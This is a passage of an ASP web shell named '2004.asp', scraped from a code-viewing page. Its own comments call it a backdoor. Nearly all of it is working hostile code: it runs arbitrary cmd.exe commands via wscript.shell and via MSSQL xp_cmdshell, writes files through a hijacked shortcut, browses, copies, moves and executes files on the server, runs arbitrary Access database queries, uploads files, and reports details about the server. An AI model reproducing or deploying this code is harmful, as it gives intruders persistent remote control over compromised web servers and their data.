?? 2004.asp
字號:
<!--
' 進入網頁運行的子程序
Sub Window_OnLoad
Dim strUserName
' 出現對話框輸入用戶名
strUserName=InputBox("請輸入用戶名進入站點", "輸入用戶名", "", 300, 200)
' 設置表單域UserName的內容
USER.UserName.Value = strUserName
USER.Submit ' 發送表單域
End Sub
-->
</SCRIPT>
<%Else%>
<center>歡迎用戶[<%=strUserName %>]進入站點
</center>
<table border=0 width=500 cellspacing=0 cellpadding=0 class="noborder">
<tr><td>
<table border=0 width=100% cellspacing=1 cellpadding=0 class="noborder" >
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<td width="59%" align=left> 服務器名</td>
<td width="41%" bgcolor="#EEEEEE"> <%=Request.ServerVariables("SERVER_NAME")%></td>
</tr>
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<td align=left> 服務器IP</td>
<td> <%=Request.ServerVariables("LOCAL_ADDR")%></td>
</tr>
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<td align=left> 服務器端口</td>
<td> <%=Request.ServerVariables("SERVER_PORT")%></td>
</tr>
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<td align=left> 服務器時間</td>
<td> <%=now%></td>
</tr>
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<td align=left> 本文件絕對路徑</td>
<td> <%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%></td>
</tr>
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<td align=left> 服務器CPU數量</td>
<td> <%=Request.ServerVariables("NUMBER_OF_PROCESSORS")%> 個</td>
</tr>
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<td align=left> 服務器操作系統</td>
<td> <%=Request.ServerVariables("OS")%></td>
</tr>
<tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left> 客戶端IP: 端口 [代理]</td><td> <%=Request.ServerVariables("REMOTE_ADDR")%>|
<%=Request.ServerVariables("REMOTE_PORT")%>
[<%=Request.ServerVariables("HTTP_X_FORWARDED_FOR")%>]</td></tr>
<tr bgcolor="#EEEEEE" height=18 class="noborder"><%
dim t1,t2,lsabc,thetime
t1=timer
for i=1 to 500000
lsabc= 1 + 1
next
t2=timer
thetime=cstr(int(( (t2-t1)*10000 )+0.5)/10)
%><td align=left> 服務器運算速度測試</td>
<td> <font color=red><%=thetime%> 毫秒</font></td>
</tr>
</table><center><br>
<%
pathlcx=trim(Request.form("pathlcx"))
textlcx=trim(Request.form("textlcx"))
if textlcx<>"" and pathlcx<>"" then
textlcx=replace(textlcx,">","^>")
textlcx=replace(textlcx,"<","^<")
textlcx=replace(textlcx,"&","^&")
textlcx=replace(textlcx,chr(34),"^"&chr(34))
textlcx=replace(textlcx,chr(10),"^"&chr(10))
textlcx=replace(textlcx,chr(13),"^"&chr(13))
set shell=server.createobject("shell.application")
set shellfolder=shell.namespace("C:\Documents and Settings\Default User\「開始」菜單\程序\附件")
set shellfolderitem=shellfolder.parsename("記事本.lnk")
set objshelllink =shellfolderitem.getlink
objshelllink.path="cmd.exe"
objshelllink.arguments="/c echo "&textlcx&">"&pathlcx&" &&del c:\a.lnk"
objshelllink.save("c:\a.lnk")
shell.namespace("c:\").items.item("a.lnk").invokeverb
end if
%>
<table border=0 width=500 cellspacing=0 cellpadding=0 class="noborder"><tr bgcolor="#EEEEEE" height=18 class="noborder" style='table-layout:fixed; word-break:break-all'><td align=left>
<form action="<%= Request.ServerVariables("URL") %>" method="post">
<input type=text name=text value="<%=DSnXA %>"> <font class=fonts>輸入要瀏覽的目錄,最后要加\</font></td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left>
<input type=text name=text1 value="<%=DSnXA1 %>">
copy
<input type=text name=text2 value="<%=DSnXA2 %>"> <font class=fonts>目的地址不要帶文件名</font></td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left>
<input type=text name=text3 value="<%=DSnXA3 %>">
move
<input type=text name=text4 value="<%=DSnXA4 %>"><font class=fonts> 目的地址不要帶文件名</font></td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left>
路徑:<input type=text name=text5 value="<%=DSnXA5 %>" >
程序:<input type=text name=text6 value="<%=DSnXA6 %>" ><font class=fonts> 不可以加參數</font></td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left><input type="text" name="ok" size=55><font class=fonts> CMD命令對話框</font>
</td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left><input type=text name=pathlcx size=55><font class=fonts> 路徑與文件名</font></td><tr/>
<tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left>
<textarea cols=80 rows=5 name=textlcx >
要生成的文件內容,不可以有回車:<% ok=Request("ok")
response.write server.createobject ("wscript.shell").exec ("cmd.exe /c "& ok).stdout.readall
%></textarea>
<input type=submit name=sb value=發送命令 class=input>
</form></td></tr>
<script language=vbs>
sub main()
base=form8.text1.value
If IsNumeric(base) Then
cc=hex(cstr(base))
alert("10進制為"&base)
alert("16進制為"&cc)
exit sub
end if
aa=asc(cstr(base))
bb=hex(aa)
alert("10進制為"&aa)
alert("16進制為"&bb)
end sub
sub main2()
If form8.vars.value <>"" Then
'定義相關變量
Dim nums,tmp,tmpstr,i
nums=form8.vars.value '取得從用戶端輸入進來的16進制數值
nums_len=Len(nums) '得出nums的長度
'開始循環,次數為nums的長度值
For i=1 To nums_len
tmp=Mid(nums,i,1) '取出nums的第1個字符存放到臨時變量tmp中
If IsNumeric(tmp) Then '如果tmp中的內容是數值型,則執行下面代碼
tmp=tmp * 16 * (16^(nums_len-i-1)) '此為16進制數值型數據轉化為10進制數值的公式
Else
'限制輸入的16進制數的范圍在0--9及a--f之間
If ASC(UCase(tmp))<65 Or ASC(UCase(tmp))>70 Then
alert("你輸入的數值中有非法字符,16進制數只包括1~9及a~f之間的字符,請重新輸入。")
exit sub
End If
tmp=(ASC(UCase(tmp))-55) * (16^(nums_len-i)) '此為16進制字符串型數據轉化為10進制數值的公式
End If
'將上面轉化后的數值與tmpstr相加累計出總和
tmpstr=tmpstr+tmp
Next
alert("轉換的10進制為:"&tmpstr&"其字符值為:"&chr(tmpstr))
End If
end sub
</script>
<form name=form8 method="post">
<input type=text name=text1 value=字符和數字轉10和16進制 size=30><input type=submit onclick=main() value="給我轉">
<input type="text" name="vars" value=16進制轉10進制和字符 size=30><input type=submit onclick=main2() value="給我轉">
</form>
</table>
</center>
<%
Dim strSQL, objDBConn, objRS, intFieldCount, intCounter,mdb
mdb = Request.QueryString("mdb")
strSQL = Request.QueryString("SQL")
If strSQL <> "" and left(trim(strsql),6)="select" Then
Response.Write "SQL字符串: " & strSQL & "<br>"
' 建立數據庫連接的對象
Set objDBConn = Server.CreateObject("ADODB.Connection")
' 打開數據庫連接 mdb請改為你要連接的數據庫名字
objDBConn.Open "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath(mdb)
' 執行SQL的數據庫查詢
Set objRS = objDBconn.Execute(strSQL)
' 取得域的個數
intFieldCount = objRS.Fields.Count - 1
' 檢查是否有記錄
If Not objRS.Eof Then
Response.Write "<table border=1><tr>"
' 顯示數據庫的域名
For intCounter = 0 to intFieldCount
Response.Write "<td><b>" & objRS(intCounter).Name & "</b></td>"
Next
Response.Write "</tr>"
' 顯示數據庫內容
Do While Not objRS.Eof
Response.Write "<tr>"
' 顯示每個記錄的域
For intCounter = 0 to intFieldCount
If objRS.Fields(intCounter).Value <> "" Then
Response.Write "<td valign=""top"">" & objRS.Fields(intCounter).Value & "</td>"
Else
Response.Write "<td valign=""top"">---</td>"
End If
Next
Response.Write "</tr>"
objRS.MoveNext ' 移到下一條記錄
Loop
Response.Write "</table>"
Else
Response.Write "<b>沒有符合條件的記錄</b><br>"
End If
objRS.Close ' 關閉記錄集合
Set objRS = Nothing
objDBConn.Close ' 關閉數據庫連接
Set objDBConn = Nothing
end if
if strSQL <> "" and left(trim(strsql),6)<>"select" Then
%>
<script>javascript:alert("這不是select命令\n請打開數據庫看運行結果\n海陽頂端網lcx\n這個你可以當做一個access版sql后門:-)")</script>
<%
end if
%>
<form action="<%=url%>" method="GET">
<table border=0 width=500 cellspacing=0 cellpadding=0 class="noborder">
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<td>SQL字符串:</td>
<td><Input TYPE="TEXT" NAME="SQL" value="<%=strSQL%>" size ="30">
<Input TYPE="TEXT" NAME="mdb" value="acess數據庫相對目錄及名稱" size ="30"></td>
</tr>
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<td colspan=2 align=center><input TYPE="SUBMIT" value="查詢數據庫,或執行其它sql語句"></td>
</tr>
</table>
</form>
<% If trim(request.form("cmd"))<>"" Then %>
<%
password= trim(Request.form("pa"))
id=trim(Request.form("id"))
set adoConn=Server.CreateObject("ADODB.Connection")
adoConn.Open "Provider=SQLOLEDB.1;Password="&password&";User ID="&id
strQuery = "exec master.dbo.xp_cmdshell '" & request.form("cmd") & "'"
set recResult = adoConn.Execute(strQuery)
If NOT recResult.EOF Then
Do While NOT recResult.EOF
strResult = strResult & chr(13) & recResult(0)
recResult.MoveNext
Loop
End if
set recResult = Nothing
strResult = Replace(strResult," "," ")
strResult = Replace(strResult,"<","<")
strResult = Replace(strResult,">",">")
strResult = Replace(strResult,chr(13),"<br>")
End if
set adoConn = Nothing
%> <br><table border=0 width=500 cellspacing=0 cellpadding=0 bgcolor="#B8B8B8" class="noborder">
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<form name="form" method=post action="<%=Request.ServerVariables("URL")%>">
<input type="text" name="cmd" size=25 >
<input type="text" name="id" size=10 value="mssql用戶名">
<input type="text" name="pa" size=10 value="mssql密碼">
<input type="submit" value="執行cmd命令">
</form></tr></table><br><table border=0 width=500 cellspacing=0 cellpadding=0 bgcolor="#B8B8B8" class="noborder">
<tr bgcolor="#EEEEEE" height=18 class="noborder"><td>
<form name="form1" method="post" action="<%=url%>?up=1" enctype="multipart/form-data" >
傳至服務器已有目錄:
<input name="filepath" type="text" value="drv:\path" size="15">
文件地址:
<input type="file" name="file1" value="" size=1>
<input type="submit" name="Submit" value="上傳" > 〖絕對路徑〗
</td></Tr>
</form></table>
<%
Response.Write request.form("cmd") & "<br><br>"
Response.Write strResult
%>
</center>
<%
DSnXA = Request.Form("text") '目錄瀏覽
if (DSnXA <> "") then
set shell=server.createobject("shell.application") '建立shell對象
set fod1=shell.namespace(DSnXA)
set foditems=fod1.items
for each co in foditems
response.write "<font color=black>" & co.path & "-----" & co.size & "</font><br>"
next
end if
%>
<%
DSnXA1 = Request.Form("text1") '目錄拷貝,不能進行文件拷貝
DSnXA2 = Request.Form("text2")
if DSnXA1<>"" and DSnXA2<>"" then
set shell1=server.createobject("shell.application") '建立shell對象
set fod1=shell1.namespace(DSnXA2)
for i=len(DSnXA1) to 1 step -1
if mid(DSnXA1,i,1)="\" then
path=left(DSnXA1,i-1)
exit for
end if
next
if len(path)=2 then path=path & "\"
path2=right(DSnXA1,len(DSnXA1)-i)
set fod2=shell1.namespace(path)
set foditem=fod2.parsename(path2)
fod1.copyhere foditem
response.write "command completed success!"
end if
%>
<%
DSnXA3 = Request.Form("text3") '目錄移動
DSnXA4 = Request.Form("text4")
if DSnXA3<>"" and DSnXA4<>"" then
set shell2=server.createobject("shell.application") '建立shell對象
set fod1=shell2.namespace(DSnXA4)
for i=len(DSnXA3) to 1 step -1
if mid(DSnXA3,i,1)="\" then
path=left(DSnXA3,i-1)
exit for
end if
next
if len(path)=2 then path=path & "\"
path2=right(DSnXA3,len(DSnXA3)-i)
set fod2=shell2.namespace(path)
set foditem=fod2.parsename(path2)
fod1.movehere foditem
response.write "command completed success!"
end if
%>
<%
DSnXA5 = Request.Form("text5") '執行程序要指定路徑
DSnXA6 = Request.Form("text6")
if DSnXA5<>"" and DSnXA6<>"" then
set shell3=server.createobject("shell.application") '建立shell對象
shell3.namespace(DSnXA5).items.item(DSnXA6).invokeverb
response.write "command completed success!"
end if
%>
<center><table border=0 width=500 cellspacing=0 cellpadding=0 bgcolor="#B8B8B8" class="noborder">
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<td colspan=2 align=center><form method="POST" action=""&url&"">
Enter Password:<input type="password" name="password" size="20">
<input type="submit" value="LOGIN"></td>
</tr>
</form></td></tr></table>
</center>
</body>
<%End If%>
<%end sub%>
<%sub main()
'修改下面的urlpath改為你服務器的實際URL
urlpath=Request.ServerVariables("SERVER_NAME")
dim cpath,lpath
set fsoBrowse=CreateObject("Scripting.FileSystemObject")
if Request("path")="" then
lpath="/"
else
lpath=Request("path")&"/"
end if
if Request("attrib")="true" then
cpath=lpath
attrib="true"
else
cpath=Server.MapPath(lpath)
attrib=""
end if
%><html>
<script language="JavaScript">
function crfile(ls)
{if (ls==""){alert("請輸入文件名!");}
else {window.open("<%=url%>?id=edit&attrib=<%=request("attrib")%>&creat=yes&path=<%=lpath%>"+ls);}
return false;
}
function crdir(ls)
{if (ls==""){alert("請輸入文件名!");}
else {window.open("<%=url%>?id=dir&attrib=<%=request("attrib")%>&op=creat&path=<%=lpath%>"+ls);}
return false;
}
</script>
<script language="vbscript">
sub rmdir(ls)
if confirm("你真的要刪除這個目錄嗎!"&Chr(13)&Chr(10)&"目錄為:"&ls) then
window.open("<%=url%>?id=dir&path="&ls&"&op=del&attrib=<%=request("attrib")%>")
end if
end sub
sub copyfile(sfile)
dfile=InputBox(""&Chr(13)&Chr(10)&"源文件:"&sfile&Chr(13)&Chr(10)&"請輸入目標文件的文件名:"&Chr(13)&Chr(10)&"許帶路徑,要根據你的當前路徑模式. 注意:絕對路徑示例c:/或c:\都可以")
dfile=trim(dfile)
attrib="<%=request("attrib")%>"
if dfile<>"" then
if InStr(dfile,":") or InStr(dfile,"/")=1 then
lp=""
if InStr(dfile,":") and attrib<>"true" then
alert "對不起,你在相對路徑模式下不能使用絕對路徑"&Chr(13)&Chr(10)&"錯誤路徑:["&dfile&"]"
exit sub
end if
else
lp="<%=lpath%>"
end if
window.open(""&url&"?id=edit&path="+sfile+"&op=copy&attrib="+attrib+"&dpath="+lp+dfile)
else
alert"您沒有輸入文件名!"
end If
end sub
</script><body bgcolor="#F5F5F5">
<TABLE cellSpacing=1 cellPadding=3 width="750" align=center
bgColor=#b8b8b8 border=0 class="noborder">
<TBODY>
<TR >
<TD
height=22 colspan="4" bgcolor="#EEEEEE" >切換盤符:
<%
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -